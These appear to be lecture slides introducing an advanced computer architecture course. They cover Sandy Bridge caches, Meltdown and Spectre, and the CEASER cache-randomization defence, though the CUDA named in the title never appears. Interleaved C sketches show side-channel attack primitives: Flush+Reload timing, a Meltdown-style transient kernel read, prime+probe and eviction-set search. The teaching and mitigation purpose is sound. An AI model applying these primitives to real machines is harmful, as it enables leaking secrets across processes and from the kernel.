Introduction to Advanced Computer Architecture with CUDA Programming
Delve into topics including the Intel Sandy Bridge architecture, micro-architectural details, and modern security attacks. Explore core concepts of processor design, out-of-order execution, and memory access units to deepen your knowledge of computer architecture.
Advanced Computer Architecture: Introduction to CUDA Programming
Andreas Moshovos, Winter 2019
Introduction
Goals for Today
- Should you take the course?
- What should you know?
- What is expected of you
- What you will get out of it
Should you take the course? What should you know?
- I'll let you decide on your own
- To help you: an overview of modern processor design, through reviewing modern security attacks
- And to make it worthwhile for everyone: through reviewing a recent, excellent work on mitigating them
Material for Today
- Intel Sandy Bridge overview: an older design, but as far as our discussion is concerned Intel still uses the same microarchitecture with minor tweaks
- Meltdown and Spectre attacks: you have to really understand the micro-architecture to get them
- Moin Qureshi's CEASER: Mitigating Conflict-Based Cache Attacks via Encrypted-Address and Remapping. MICRO 2018: 775-787 (best paper award)
Chip Architecture (32nm)
Memory Access Units
- L1 load-to-use latency is 4 cycles
- Banked to support multiple accesses: a poor man's multiporting?
- L2 load-to-use latency is 12 cycles
L3 and Ring Interconnect
- CPUs, GPU, and system agent communicate via a ring
- Each CPU has a 2MB, 8-way set-associative L3 slice
- Static hash of addresses to slices
- Latency varies depending on which core accesses which slice: 26-31 cycles
- Max bandwidth: 435.2 GB/s at 3.4 GHz
Isolation
- User vs. kernel space isolation via a privilege bit
- Kernel space is mapped into the user address space
Overview of the Attack
- Exploit speculative execution to temporarily load protected data into a register
- Use the value to cause a micro-architectural state change that persists
Flush+Reload
- The clflush instruction flushes any cache line that contains a specific address
- Works for shared addresses: think code that is shared between two processes
- The paper shows how to use this to read a secret key by detecting the order in which code functions are called
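A minimal C sketch of the Flush+Reload primitive, assuming an x86-64 machine with gcc/clang intrinsics, a shared read-only mapping, and a machine-specific hit/miss threshold (all of these are assumptions, not from the slides):

    /* Flush+Reload sketch; THRESHOLD is a made-up, machine-specific cutoff. */
    #include <stdint.h>
    #include <x86intrin.h>               /* _mm_clflush, _mm_mfence, __rdtscp */

    #define THRESHOLD 120                /* assumed cache-hit/miss cutoff in cycles */

    static inline uint64_t time_access(const void *addr)
    {
        unsigned aux;
        uint64_t start = __rdtscp(&aux);
        *(volatile const uint8_t *)addr; /* the RELOAD */
        return __rdtscp(&aux) - start;
    }

    /* Returns 1 if the victim touched `shared` between the flush and the reload. */
    int probe(const void *shared)
    {
        _mm_clflush(shared);             /* FLUSH: evict the shared line */
        _mm_mfence();
        /* ... wait while the victim runs ... */
        return time_access(shared) < THRESHOLD;  /* fast reload: victim accessed it */
    }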
Exceptions
- E.g., divide by zero or access to an illegal address
- Suppression vs. handling
- Handling: fork prior to the exception
- Suppression: use transactional memory
- Branch-prediction exploitation (Spectre)
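As a small illustration of the suppression option, the sketch below wraps a faulting access in an Intel TSX (RTM) transaction so the fault aborts the transaction instead of reaching the OS. This assumes RTM-capable hardware and compiling with -mrtm; a fork()-based "handling" variant would instead catch the SIGSEGV in the child.

    #include <immintrin.h>

    void suppressed_access(const volatile char *illegal_addr)
    {
        if (_xbegin() == _XBEGIN_STARTED) {
            (void)*illegal_addr;   /* the faulting load aborts the transaction */
            _xend();
        }
        /* execution resumes here; no OS-visible exception is delivered */
    }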
Example
- The mov attempts to read the secret address [rcx] into register AL; this will raise a protection exception, but the CPU still executes it as part of speculative execution, and the exception is only handled when the mov tries to retire (commit)
- The SHL by 12 multiplies the AL value by 4K, the page size
- The mov into RBX then tries to read a page at a distance determined by the AL value; this is a race, so it may or may not happen
- Step 2: the attacker times accesses to all 256 pages
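Below is a conceptual C rendering of that transient sequence (the slide's original listing is x86 assembly); probe_array, its page-sized stride, and kernel_addr are illustrative assumptions, not the slide's code:

    #include <stdint.h>

    extern uint8_t probe_array[256 * 4096];     /* assumed: one page per byte value, flushed beforehand */

    void transient_leak(const volatile uint8_t *kernel_addr)
    {
        uint8_t secret = *kernel_addr;          /* "mov al, [rcx]": faults at retirement,
                                                   but still executes speculatively */
        (void)*(volatile uint8_t *)
            &probe_array[(uint32_t)secret << 12];  /* "shl rax, 12; mov rbx, [...]": pulls the
                                                      page selected by the secret into the cache */
        /* step 2 (not shown): time accesses to all 256 pages with Flush+Reload;
           the one fast page reveals the secret byte */
    }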
Goal
- The LLC is shared and contains micro-architectural state
- Using side-channel attacks, a process can read values from another process through this side channel
- To do so, the attacker needs to know how addresses are mapped onto the LLC
- CEASER: randomize the mapping and change it frequently
CEASER: Mitigating Conflict-Based Attacks via Encrypted-Address and Remapping (Moinuddin Qureshi, MICRO 2018)
Background: Resource Sharing
- Modern systems share the LLC to improve resource utilization
- [Figure: two cores sharing one LLC]
- Sharing the LLC allows the system to dynamically allocate LLC capacity
Conflict-Based Cache Attacks
- A co-running spy can infer the access pattern of the victim by causing cache conflicts
- [Figure: the spy's line B misses after the victim accesses the same LLC set]
- Conflicts leak the access pattern, which can be used to infer secrets [AES, Bernstein '05]
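For concreteness, here is a minimal C sketch of the conflict probe (prime the set, let the victim run, then re-access and time). The eviction-set array, the timing helper, and the threshold are assumptions rather than anything from the slide:

    #include <stdint.h>
    #include <stddef.h>

    #define MISS_THRESHOLD 200           /* assumed LLC hit/miss cutoff, machine specific */

    uint64_t time_access(const void *addr);   /* assumed timing helper, as in the Flush+Reload sketch */

    /* Prime the victim's set with our own lines, let the victim run, then re-access them:
       a slow (missing) line means the victim touched this set. */
    int victim_touched_set(uint8_t **evset, size_t n)
    {
        for (size_t i = 0; i < n; i++)                 /* PRIME */
            (void)*(volatile uint8_t *)evset[i];
        /* ... victim executes ... */
        for (size_t i = 0; i < n; i++)                 /* PROBE */
            if (time_access(evset[i]) > MISS_THRESHOLD)
                return 1;                              /* conflict miss: victim accessed the set */
        return 0;
    }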
Prior Solutions
- Way Partitioning: NoMo [TACO'12], CATalyst [HPCA'16]
- Table-Based Randomization with a Mapping Table (MT): RPCache [ISCA'07], NewCache [MICRO'08]
- Drawbacks: the Mapping Table becomes large for an LLC (MBs), inefficient use of cache space, OS support needed to protect the table, not scalable to many cores
Our Goal
Protect the LLC from conflict-based attacks, while incurring:
1. Negligible storage overhead
2. Negligible performance overhead
3. No OS support
4. No restriction on capacity sharing
5. Localized implementation
Outline: Why? | CEASE | CEASER | Effective?
CEASE: Cache using Encrypted Address Space
- Insight: don't memorize the random mapping, compute it
- The Physical Line Address (PLA, e.g. 0xCAFE0000) is encrypted with a key into an Encrypted Line Address (ELA, e.g. 0xa17b20cf), which indexes the LLC; on a dirty eviction the ELA is decrypted back to the PLA
- Localized change: the ELA is visible only within the cache
- Cache operations (access, coherence, prefetch) all remain unchanged
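As a rough illustration of this computed mapping, the C sketch below shows how a set index could be derived from the ELA and how a dirty eviction would recover the PLA. The names llbc_encrypt, cease_set_index, and NUM_SETS are illustrative, not from the paper; the cipher itself is sketched after the LLBC slide further below.

    #include <stdint.h>

    #define NUM_SETS 8192                          /* illustrative LLC size */

    uint64_t llbc_encrypt(uint64_t pla, const uint32_t round_keys[4]);  /* 40-bit cipher, sketched below */
    uint64_t llbc_decrypt(uint64_t ela, const uint32_t round_keys[4]);

    /* Index (and tag) the cache with the Encrypted Line Address. */
    uint64_t cease_set_index(uint64_t pla, const uint32_t round_keys[4])
    {
        uint64_t ela = llbc_encrypt(pla, round_keys);  /* e.g. 0xCAFE0000 -> 0xa17b20cf */
        return ela % NUM_SETS;
    }

    /* On a dirty eviction, recover the writeback address by decrypting the ELA. */
    uint64_t cease_writeback_address(uint64_t ela, const uint32_t round_keys[4])
    {
        return llbc_decrypt(ela, round_keys);
    }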
Randomization via Encryption
- Lines that mapped to the same set get scattered to different sets
- [Figure: lines A and B conflict in a conventional LLC but map to different sets under CEASE]
- The mapping depends on the key; different machines have different keys
Encryption: Need a Fast, Small-Width Cipher
- The PLA is ~40 bits (up to 64TB of memory)
- A wider, off-the-shelf block cipher would enlarge the tag (80+ bits) and add a latency of 10+ cycles
- Small-width ciphers are deemed insecure: brute-force attack on the key, or memorize all input-output pairs
- Insight: the ELA is not visible to the attacker, so it is okay to use a 40-bit block cipher
Low-Latency Block Cipher (LLBC)
- A four-stage Feistel network (with a substitution-permutation network), inspired by DES and Blowfish
- Encryption with the LLBC incurs a delay of 24 XOR gates (approximately 2-cycle latency)
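To make the structure concrete, here is a minimal C sketch of a four-stage Feistel network over a 40-bit address. The round function, rotation amount, and key layout are illustrative stand-ins, not the exact substitution-permutation network used by CEASER.

    #include <stdint.h>

    #define HALF_MASK ((1u << 20) - 1)             /* a 40-bit block split into two 20-bit halves */

    /* Stand-in round function: a keyed XOR plus a cheap 20-bit rotation. */
    static uint32_t F(uint32_t half, uint32_t round_key)
    {
        uint32_t x = (half ^ round_key) & HALF_MASK;
        return ((x << 7) | (x >> 13)) & HALF_MASK;
    }

    uint64_t llbc_encrypt(uint64_t pla, const uint32_t round_keys[4])
    {
        uint32_t L = (uint32_t)(pla >> 20) & HALF_MASK;
        uint32_t R = (uint32_t)pla & HALF_MASK;
        for (int i = 0; i < 4; i++) {              /* four Feistel stages */
            uint32_t newL = R;
            uint32_t newR = (L ^ F(R, round_keys[i])) & HALF_MASK;
            L = newL;
            R = newR;
        }
        return ((uint64_t)L << 20) | R;            /* the 40-bit ELA */
    }

    /* Decryption (not shown) runs the same stages with the round keys in
       reverse order, the standard Feistel property. */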
Outline: Why? | CEASE | CEASER | Effective?
Let's Break CEASE [Liu et al., S&P 2015]
- Form a pattern of lines such that the cache has a conflict miss
- Remove one line from the pattern and check for the conflict again:
  - Conflict miss gone? The removed line maps to the conflicting set
  - Conflict miss still there? The removed line is not in the conflicting set
- An attacker can break CEASE within 22 seconds (8MB LLC)
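A hedged sketch of that elimination loop in C, assuming a helper causes_conflict() that primes the cache with the candidate lines and reports whether reloading the target then misses:

    #include <stddef.h>
    #include <stdint.h>

    /* Assumed helper: prime the cache with the n candidate lines and report
       whether reloading `target` then misses (i.e. a conflict occurred). */
    int causes_conflict(uint8_t **cand, size_t n, const void *target);

    /* Drop candidates one at a time; if the conflict for `target` disappears,
       the dropped line maps to the conflicting set, so keep it. */
    size_t minimize_eviction_set(uint8_t **cand, size_t n, const void *target)
    {
        for (size_t i = 0; i < n; ) {
            uint8_t *removed = cand[i];
            cand[i] = cand[n - 1];                    /* temporarily drop candidate i */
            if (causes_conflict(cand, n - 1, target)) {
                n--;                                  /* still conflicts: line i was not needed */
            } else {
                cand[n - 1] = cand[i];                /* conflict gone: restore line i */
                cand[i] = removed;
                i++;
            }
        }
        return n;                                     /* the survivors form the eviction set */
    }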
CEASER: CEASE with Remapping
- Split time into epochs of N accesses and change the key every epoch
- [Figure: timelines contrasting bulk remapping of the whole cache with gradual remapping from CurrKey to NextKey]
- CEASER uses gradual remapping to periodically change the keys
CEASER: CEASE with Remapping
- Remap rate of 1%: remap one set of a W-way cache after 100*W accesses
- A set pointer (SPtr) sweeps through the sets; sets behind it have already been relocated from the CurrKey mapping to the NextKey mapping
- Cache access: if Set[CurrKey] < SPtr, use NextKey
- Once SPtr wraps around, the epoch ends and NextKey becomes CurrKey
- CEASER with gradual remap needs negligible hardware (one bit per line)
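The following C sketch is one speculative way to model this gradual-remap bookkeeping; the structure and constant names (ceaser_state, REMAP_RATE, WAYS) are invented for illustration, and the real mechanism is a hardware state machine rather than software.

    #include <stdint.h>

    #define WAYS        16                 /* illustrative geometry */
    #define NUM_SETS    8192
    #define REMAP_RATE  100                /* 1%: relocate one set every 100*WAYS accesses */

    uint64_t llbc_encrypt(uint64_t pla, const uint32_t round_keys[4]);   /* as sketched earlier */

    struct ceaser_state {
        uint32_t curr_keys[4], next_keys[4];   /* round keys for CurrKey / NextKey */
        uint32_t sptr;                         /* sets below sptr already use NextKey */
        uint32_t access_ctr;
    };

    /* "If (Set[CurrKey] < SPtr) use NextKey" */
    uint32_t ceaser_set_index(const struct ceaser_state *s, uint64_t pla)
    {
        uint32_t set = llbc_encrypt(pla, s->curr_keys) % NUM_SETS;
        if (set < s->sptr)
            set = llbc_encrypt(pla, s->next_keys) % NUM_SETS;
        return set;
    }

    /* Called on every LLC access: after 100*WAYS accesses, relocate one more set. */
    void ceaser_tick(struct ceaser_state *s)
    {
        if (++s->access_ctr < REMAP_RATE * WAYS)
            return;
        s->access_ctr = 0;
        /* relocate the lines of set s->sptr so they index under NextKey (not shown) */
        if (++s->sptr == NUM_SETS) {           /* epoch complete: NextKey becomes CurrKey */
            s->sptr = 0;
            for (int i = 0; i < 4; i++)
                s->curr_keys[i] = s->next_keys[i];
            /* ... then draw fresh next_keys ... */
        }
    }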
Outline: Why? | CEASE | CEASER | Effective?
Security Analysis
Time to learn an eviction set for one set (the vulnerability is removed after a remap, <1ms):
- Remap rate 1% (default): 100+ years (8MB LLC), 100+ years (1MB LLC bank)
- Remap rate 0.5%: 100+ years (8MB LLC), 21 years (1MB LLC bank)
- Remap rate 0.1%: 100+ years (8MB LLC), 5 hours (1MB LLC bank)
- Remap rate 0.05%: 37 years (8MB LLC), 5 minutes (1MB LLC bank)
- No remap (CEASE): 22 seconds (8MB LLC), 0.4 seconds (1MB LLC bank)
The default 1% remap rate limits the impact on miss rate, energy, and accesses to ~1%.
CEASER can tolerate years of attack, even with a remap rate of 1%.
Performance and Storage Overheads
- Configuration: 8 cores with an 8MB, 16-way LLC (34 workloads, SPEC + Graph)
- [Chart: normalized performance (%) for the Rate-34, Mix-100, and ALL-134 workload groups; y-axis from 95 to 100]
- Storage cost: 80-bit keys (2 LLBCs) 20 bytes, SPtr 2 bytes, access counter 2 bytes, total 24 bytes
- CEASER incurs negligible slowdown (~1%) and storage overhead (24 bytes)
Summary
- A practical solution is needed to protect the LLC from conflict-based attacks
- CEASER encrypts the line address and changes the key periodically
- Robust to attacks (years)
- Negligible slowdown (~1%)
- Negligible storage (24 bytes)
- Localized change (within the cache)
- No OS support needed
- Appealing for industrial adoption
On average we will meet once per week. I will be traveling at times and will make up for the lost time by holding two lectures in some weeks.
What I expect you to do:
- Reading assignments each week
- Questionnaires to be handed in at the beginning of class
- Homeworks
- Programming assignments
- Project: validate some prior work, or do something new
- Maybe present papers (we will see)